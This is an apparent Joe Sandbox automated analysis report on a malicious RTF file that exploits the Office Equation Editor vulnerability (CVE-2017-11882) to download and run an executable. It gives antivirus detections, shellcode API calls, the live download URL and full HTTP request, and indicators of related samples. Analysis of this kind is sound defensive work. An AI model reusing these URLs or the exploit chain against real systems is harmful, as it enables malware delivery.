Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:23.0.0
Analysis ID:71214
Start date:06.08.2018
Start time:20:44:02
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 13s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:LyTaZHwHpG (renamed file extension from none to rtf)
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:5
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal80.expl.winRTF@4/9@3/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 2
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Simulate clicks
  • Found warning dialog
  • Click Ok
  • Number of clicks 1
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE

Detection

StrategyScoreRangeReportingDetection
Threshold800 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample HTTP request are all non existing, likely the sample is no longer working
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for submitted fileShow sources
Source: LyTaZHwHpG.rtfAvira: Label: EXP/CVE-2017-11882.A
Multi AV Scanner detection for domain / URLShow sources
Source: http://emifile.com/frak/obai/okbimnanna.exevirustotal: Detection: 14%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: LyTaZHwHpG.rtfvirustotal: Detection: 68%Perma Link
Source: LyTaZHwHpG.rtfmetadefender: Detection: 37%Perma Link

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEJump to behavior
Office Equation Editor has been startedShow sources
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Software Vulnerabilities:

barindex
Potential downloader shellcode foundShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_006913E6 LoadLibraryA,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_006913E6
Shellcode detectedShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_006913E6 LoadLibraryA,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_006913E6
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: emifile.com
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49163 -> 178.128.90.174:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.2:49163 -> 178.128.90.174:80

Networking:

barindex
Domain name seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDomain Name: emifile.com emifile.com
Contains functionality to download and execute PE filesShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_006913E6 LoadLibraryA,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_006913E6
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /frak/obai/okbimnanna.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: emifile.comConnection: Keep-Alive
Contains functionality to download additional files from the internetShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_006913E6 LoadLibraryA,URLDownloadToFileW,CreateProcessW,ExitProcess,2_2_006913E6
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /frak/obai/okbimnanna.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: emifile.comConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: emifile.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Aug 2018 18:44:44 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.45X-Powered-By: PHP/5.4.45Set-Cookie: PHPSESSID=pnss6f6ai8njn59f4ml35u8cd0; path=/; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: default=022d24ecdc771ed8b19a863639; path=/; httponlySet-Cookie: language=en-gb; expires=Wed, 05-Sep-2018 18:44:44 GMT; path=/; domain=emifile.comSet-Cookie: currency=MYR; expires=Wed, 05-Sep-2018 18:44:44 GMT; path=/; domain=emifile.comKeep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 62 30 63 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f
Tries to download non-existing http data (HTTP/1.1 404 Not Found)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Aug 2018 18:44:44 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.45X-Powered-By: PHP/5.4.45Set-Cookie: PHPSESSID=pnss6f6ai8njn59f4ml35u8cd0; path=/; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: default=022d24ecdc771ed8b19a863639; path=/; httponlySet-Cookie: language=en-gb; expires=Wed, 05-Sep-2018 18:44:44 GMT; path=/; domain=emifile.comSet-Cookie: currency=MYR; expires=Wed, 05-Sep-2018 18:44:44 GMT; path=/; domain=emifile.comKeep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 32 62 30 63 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f
Urls found in memory or binary dataShow sources
Source: WINWORD.EXE, 00000001.00000002.21436071981.012E0000.00000004.sdmpString found in binary or memory: file:///C:
Source: WINWORD.EXE, 00000001.00000002.21435221695.00394000.00000004.sdmpString found in binary or memory: file:///C:/Users/Herb%20Blackburn/Desktop/LyTaZHwHpG.rtf
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.21013383798.0069D000.00000004.sdmpString found in binary or memory: http://emifile.com/frak/obai/okbimnanna.exe
Source: EQNEDT32.EXE, 00000002.00000002.21013342670.0066D000.00000004.sdmpString found in binary or memory: http://emifile.com/frak/obai/okbimnanna.exe%APPDATA%
Source: EQNEDT32.EXE, 00000002.00000002.21013383798.0069D000.00000004.sdmpString found in binary or memory: https://fonts.gstatic.com

System Summary:

barindex
Reads the hosts fileShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal80.expl.winRTF@4/9@3/1
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$TaZHwHpG.rtfJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\HERBBL~1\AppData\Local\Temp\CVR739B.tmpJump to behavior
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: LyTaZHwHpG.rtfvirustotal: Detection: 68%
Source: LyTaZHwHpG.rtfmetadefender: Detection: 37%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\LyTaZHwHpG.rtf
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Checks whether correct version of .NET is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\UpgradesJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_00672B70 push ecx; iretd 2_2_00672B72
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_00672B30 push ecx; iretd 2_2_00672B32
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_00672A10 push ecx; iretd 2_2_00672A12
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_00672AF0 push ecx; iretd 2_2_00672AF2
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_00672BD0 push ecx; iretd 2_2_00672BD2

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXESystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality to read the PEBShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_006914DC mov edx, dword ptr fs:[00000030h]2_2_006914DC

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: WINWORD.EXE, 00000001.00000002.21435620440.00650000.00000002.sdmp, EQNEDT32.EXE, 00000004.00000002.21450139766.00670000.00000002.sdmpBinary or memory string: Progman
Source: WINWORD.EXE, 00000001.00000002.21435620440.00650000.00000002.sdmp, EQNEDT32.EXE, 00000004.00000002.21450139766.00670000.00000002.sdmpBinary or memory string: Program Manager
Source: WINWORD.EXE, 00000001.00000002.21435620440.00650000.00000002.sdmp, EQNEDT32.EXE, 00000004.00000002.21450139766.00670000.00000002.sdmpBinary or memory string: Shell_TrayWnd

Language, Device and Operating System Detection:

barindex
Queries the cryptographic machine GUIDShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 71214 Sample: LyTaZHwHpG Startdate: 06/08/2018 Architecture: WINDOWS Score: 80 15 Multi AV Scanner detection for domain / URL 2->15 17 Antivirus detection for submitted file 2->17 19 Multi AV Scanner detection for submitted file 2->19 21 3 other signatures 2->21 5 EQNEDT32.EXE 11 2->5         started        9 WINWORD.EXE 56 20 2->9         started        11 EQNEDT32.EXE 2->11         started        process3 dnsIp4 13 emifile.com 178.128.90.174, 49163, 80 FORTHNET-GRForthnetGR Greece 5->13 23 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 5->23 signatures5

Simulations

Behavior and APIs

TimeTypeDescription
20:44:45API Interceptor1145x Sleep call for process: WINWORD.EXE modified
20:44:46API Interceptor49x Sleep call for process: EQNEDT32.EXE modified

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
LyTaZHwHpG.rtf68%virustotalBrowse
LyTaZHwHpG.rtf38%metadefenderBrowse
LyTaZHwHpG.rtf100%AviraEXP/CVE-2017-11882.A

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
emifile.com4%virustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://emifile.com/frak/obai/okbimnanna.exe15%virustotalBrowse
http://emifile.com/frak/obai/okbimnanna.exe0%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
emifile.comPA78642items.doc00d39122fd8fbeeffe16b811c5f6293ab2719b15b39b561d3ecc9857bbb57c02maliciousBrowse
  • 202.157.177.148
attachmen.xlsx2012a9863ae231283c17e698d3129d5a235d79943d1c15ea9b19b5f67eccbd0dmaliciousBrowse
  • 202.157.177.148
PO 2087441006.xlsx47c4ed8fc69f5da1951d8753671f5d0f4535ab2d10ecf63c828b903a1e820622maliciousBrowse
  • 202.157.177.148
PA78642items.doc00d39122fd8fbeeffe16b811c5f6293ab2719b15b39b561d3ecc9857bbb57c02maliciousBrowse
  • 202.157.177.148
emifile.com/web/chak/Salman.exemaliciousBrowse
  • 202.157.177.148

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
FORTHNET-GRForthnetGRBK.485799485.jse74d71096ab1b39e13c4299e7a35a9809b0825e1f9ecd13d982a07f64092f4a7amaliciousBrowse
  • 178.128.2.177
https://jamiejamiename.ddns.net/o111maliciousBrowse
  • 178.128.221.116
https://onatou.netmaliciousBrowse
  • 178.128.185.24
Doc-Scan.pdfe96b3252a14ba3d296c1a1a840e775f1001b6a9ff65480158af683d8362913e6maliciousBrowse
  • 178.128.221.116
csrss.exee235d52a27a59344ccf36bb7094f5b65c0675c9f15eb52bab501d5b7ece113a5maliciousBrowse
  • 178.128.190.53

Dropped Files

No context

Screenshots